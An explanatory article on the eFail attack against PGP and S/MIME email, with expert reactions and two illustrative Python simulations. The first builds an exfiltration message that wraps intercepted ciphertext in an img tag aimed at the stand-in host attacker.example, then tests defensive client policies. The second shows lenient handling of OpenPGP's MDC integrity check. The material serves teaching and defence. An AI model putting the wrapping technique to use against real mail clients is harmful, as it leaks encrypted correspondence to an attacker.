The ubiquitous email encryption schemes PGP and S/MIME are vulnerable to attack, according to a group of German and Belgian researchers who posted their findings on Monday. The weakness could allow a hacker to expose plaintext versions of encrypted messages—a nightmare scenario for users who rely on encrypted email to protect their privacy, security, and safety.

The weakness, dubbed eFail, emerges when an attacker who has already managed to intercept your encrypted emails re-sends the ciphertext wrapped in an email of their own, with HTML elements such as image tags arranged around it. When the recipient's email client, like Outlook or Apple Mail, decrypts the message, it renders the decrypted text as part of that attacker-supplied HTML and loads the external "image" from the attacker's server, with the plaintext carried along in the request. The attacker's server simply logs what arrives.

You've Got eFail

The eFail attack requires hackers to have a high level of access in the first place that is, in itself, difficult to achieve: they need to already be able to intercept encrypted messages before they can alter and re-send them. PGP is a classic end-to-end encryption scheme that has been a go-to for secure consumer email since the 1990s, helped by the free, open standard known as OpenPGP. But the whole point of doing the extra work to keep data encrypted from the time it leaves the sender to the time it displays for the receiver is to survive exactly this kind of access: even if someone can tap into your encrypted messages, the data should still be unreadable to them. eFail is an example of that second line of defense failing.

Sebastian Schinzel, one of the researchers on the project who runs the IT security lab at the Münster University of Applied Sciences, tweeted early Monday morning that, "There are currently no reliable fixes for the vulnerability. If you use PGP/GPG or S/MIME for very sensitive communication, you should disable it in your email client for now." The Electronic Frontier Foundation issued a similar warning, that "users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email," until there are patches or other mitigations for vulnerable email clients.

This advice has struck some cryptographers as overly reactive, though; they argue that some people can't simply switch to other secure platforms and that encrypted email is still better than nothing. The bigger issue, they argue, is the lack of a coordinated approach to securing email in the first place and to handling problems as they arise.

'The core architecture of PGP encryption is very dated.' Kenn White, Open Crypto Audit Project

"For people who must use encrypted mail, there's not consensus yet on the best course of action," says Kenn White, director of the Open Crypto Audit Project. "Many people have criticized the EFF guidance, which is basically to stop using encrypted mail. I'm not sure such advice is warranted, or even practical." One option for now is to install updates for your encrypted email plugin as soon as they are released, and to disable remote image loading and HTML rendering as far as your client allows.

Essentially, you want your PGP plugin to show you only the text of a decrypted message, with none of the formatting or remote media the sender included, and to render that text on its own rather than inside whatever HTML surrounds it. The eFail researchers found, though, that many email clients are lax about when they contact remote servers, so even after adding those restrictions you may not be able to completely prevent requests to untrusted servers.
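To make the mechanism described above concrete, here is a small simulation of the HTML-wrapping attack and of the two client-side policies this section recommends (isolating decrypted parts, and not loading remote content). It is an added example written for this article, not code from the eFail researchers or from any email client; the "encryption" is a base64 stand-in so it runs offline, and the hostname `attacker.example` and the message text are constructed for the example. The MIME layout (an HTML part opening an unterminated `<img src="...` tag, the stolen encrypted part, and an HTML part closing the tag) is the one the attack relies on.

```python
"""Simulated eFail direct-exfiltration message and two client rendering policies.

Added example for this article. Not real PGP: fake_pgp_encrypt/fake_pgp_decrypt
just base64-wrap the text so the script runs stand-alone.
"""
import base64
import re
from html import escape

ATTACKER = "http://attacker.example/"   # constructed hostname for the example

# Stand-in for a PGP/MIME encrypted part (assumption: no real cryptography here).
def fake_pgp_encrypt(plaintext):
    body = base64.b64encode(plaintext.encode()).decode()
    return "-----BEGIN PGP MESSAGE-----\n" + body + "\n-----END PGP MESSAGE-----"

def fake_pgp_decrypt(armored):
    return base64.b64decode(armored.split("\n")[1]).decode()

def wrap_for_exfil(stolen_ciphertext):
    """Attacker's message: three MIME parts around the intercepted ciphertext.
    The first part opens an <img> tag whose src attribute is never closed,
    the last part closes it. Whatever the client puts in between (the
    decrypted text) becomes part of the image URL."""
    return [
        {"type": "text/html", "body": '<img src="' + ATTACKER},
        {"type": "application/pgp-encrypted", "body": stolen_ciphertext},
        {"type": "text/html", "body": '">'},
    ]

# Remote resources an HTML renderer would fetch from a document (img src only,
# which is enough for this example; real clients have more such channels).
IMG_SRC = re.compile(r'<img\s[^>]*?src="([^"]*)"', re.IGNORECASE)

def fetched_urls(html_doc):
    return IMG_SRC.findall(html_doc)

def render(parts, isolate_parts, load_remote):
    """Simulated mail client. Returns the remote URLs it would request and the
    decrypted text it showed the user.

    isolate_parts=False: decrypt in place and render the whole message as one
        HTML document (the behaviour eFail exploits).
    isolate_parts=True:  each decrypted part is shown as escaped plain text in
        its own document, never spliced into neighbouring HTML.
    load_remote=False:   remote content blocked, so nothing is fetched."""
    shown, docs = [], []
    if isolate_parts:
        for part in parts:
            if part["type"] == "application/pgp-encrypted":
                text = fake_pgp_decrypt(part["body"])
                shown.append(text)
                docs.append("<pre>" + escape(text) + "</pre>")
            else:
                docs.append(part["body"])
    else:
        doc = ""
        for part in parts:
            if part["type"] == "application/pgp-encrypted":
                text = fake_pgp_decrypt(part["body"])
                shown.append(text)
                doc += text
            else:
                doc += part["body"]
        docs.append(doc)
    requested = []
    if load_remote:
        for doc in docs:
            requested.extend(fetched_urls(doc))
    return {"shown": shown, "requested": requested}

def leaked_plaintext(result, plaintext):
    """True if the plaintext left the client inside a remote request."""
    return any(plaintext in url for url in result["requested"])

if __name__ == "__main__":
    secret = "Meet at 10pm"                      # constructed message text
    message = wrap_for_exfil(fake_pgp_encrypt(secret))
    for isolate, remote in [(False, True), (True, True), (False, False), (True, False)]:
        result = render(message, isolate, remote)
        print("isolate=%-5s remote=%-5s requests=%s leaked=%s" % (
            isolate, remote, result["requested"], leaked_plaintext(result, secret)))
```

With both protections off, the only request the client makes is to `http://attacker.example/Meet at 10pm` (a real client would percent-encode the spaces, which changes nothing for the attacker). Isolating the decrypted part defeats this particular trick even with remote loading on, because the attacker's unterminated tag no longer has anything to swallow; blocking remote content stops the fetch regardless of how the HTML is assembled. Since the researchers found clients that still reach out to remote servers in ways users cannot fully control, the safe configuration is both at once.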

Ignored Warnings

Researchers have known about the theoretical underpinnings of the eFail attack since the early 2000s, and some implementations of the OpenPGP standard already protect against it. OpenPGP's integrity check, the Modification Detection Code (MDC), is a hash of the plaintext that is encrypted along with it; if the hash does not match after decryption, the ciphertext was altered in transit, and the client can and should refuse to display the result. But eFail highlights that many email clients tolerate messages with invalid or missing MDCs instead of dropping them, to ease friction between different PGP implementations. The MDC also only catches changes to the encrypted data itself: an attacker who leaves the ciphertext untouched and merely surrounds it with crafted HTML is not detected by it, which is why how a client handles decrypted content matters as much as the cryptography.
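The following added example shows what the MDC actually checks and what a client gives up by tolerating a missing or failed one. It is illustrative code written for this article, not an OpenPGP implementation: the symmetric cipher is a stand-in (a SHA-256-derived keystream XORed with the data, which, like OpenPGP's CFB mode, lets an attacker flip plaintext bits by flipping ciphertext bits), while the packet layout follows RFC 4880, with the data prefixed by random bytes plus a repeat of the last two, and an MDC packet (header bytes 0xD3 0x14, then SHA-1 over prefix, plaintext and that header) appended before encryption. The key, prefix and message are constructed for the example.

```python
"""OpenPGP-style Modification Detection Code (MDC): strict vs lenient clients.

Added example for this article. The cipher is a toy keystream, NOT OpenPGP's
CFB mode; the MDC layout (RFC 4880 sections 5.13 and 5.14) is the real one.
"""
import hashlib
import hmac
import os

MDC_HEADER = b"\xd3\x14"   # MDC packet: tag 19, fixed 20-byte body
PREFIX_LEN = 16            # random prefix for a 128-bit block cipher, plus 2 repeated

class IntegrityError(Exception):
    pass

def keystream(key, n):
    """Toy keystream (assumption: stand-in for the block cipher in CFB mode)."""
    out, counter = b"", 0
    while len(out) < n:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:n]

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def encrypt(key, plaintext, with_mdc=True, prefix=None):
    """Returns a packet dict: tag 18 (SEIPD, carries an MDC) or tag 9 (legacy
    SED, no integrity check). `prefix` can be fixed for reproducible tests."""
    rnd = prefix if prefix is not None else os.urandom(PREFIX_LEN)
    body = rnd + rnd[-2:] + plaintext
    if with_mdc:
        mdc = hashlib.sha1(body + MDC_HEADER).digest()   # hash covers the header too
        body += MDC_HEADER + mdc
    return {"tag": 18 if with_mdc else 9, "data": xor(body, keystream(key, len(body)))}

def decrypt(key, packet, policy="strict"):
    """policy='strict': only accept a packet with a valid MDC.
    policy='lenient': what many clients did, i.e. accept legacy tag-9 packets
    and show the data even when the MDC does not verify."""
    data = xor(packet["data"], keystream(key, len(packet["data"])))
    if packet["tag"] == 9:
        if policy == "strict":
            raise IntegrityError("no MDC (legacy tag 9 packet)")
        return data[PREFIX_LEN + 2:]
    body, mdc_packet = data[:-22], data[-22:]
    expected = MDC_HEADER + hashlib.sha1(body + MDC_HEADER).digest()
    if not hmac.compare_digest(mdc_packet, expected):
        if policy == "strict":
            raise IntegrityError("MDC mismatch: ciphertext was modified")
        # lenient: fall through and display the attacker-modified plaintext
    return body[PREFIX_LEN + 2:]

def flip_byte(packet, index, mask):
    """Attacker edits the ciphertext without knowing the key; with a malleable
    cipher the same change lands in the plaintext at the same offset."""
    data = bytearray(packet["data"])
    data[index] ^= mask
    return {"tag": packet["tag"], "data": bytes(data)}

def try_decrypt(key, packet, policy):
    """('ok', plaintext) or ('rejected', reason), so outcomes are easy to compare."""
    try:
        return ("ok", decrypt(key, packet, policy))
    except IntegrityError as exc:
        return ("rejected", str(exc))

if __name__ == "__main__":
    key = b"\x01" * 32                          # constructed key
    msg = b"Pay $10 to Alice"                   # constructed message
    packet = encrypt(key, msg)
    # Turn the '1' at plaintext offset 5 into '9': 0x31 ^ 0x08 == 0x39.
    tampered = flip_byte(packet, PREFIX_LEN + 2 + 5, 0x08)
    legacy = encrypt(key, msg, with_mdc=False)
    for name, pkt in [("intact", packet), ("tampered", tampered), ("no MDC", legacy)]:
        for policy in ("strict", "lenient"):
            print("%-9s %-8s %s" % (name, policy, try_decrypt(key, pkt, policy)))
```

A strict client shows `Pay $10 to Alice` for the intact packet and rejects both the tampered packet and the legacy one; a lenient client happily displays `Pay $90 to Alice` from the tampered packet and accepts the MDC-less packet unchanged. That tolerance is the gap eFail's ciphertext-modification variant walks through, and enforcing the MDC closes it. It does nothing for the HTML-wrapping variant, where the ciphertext is never touched.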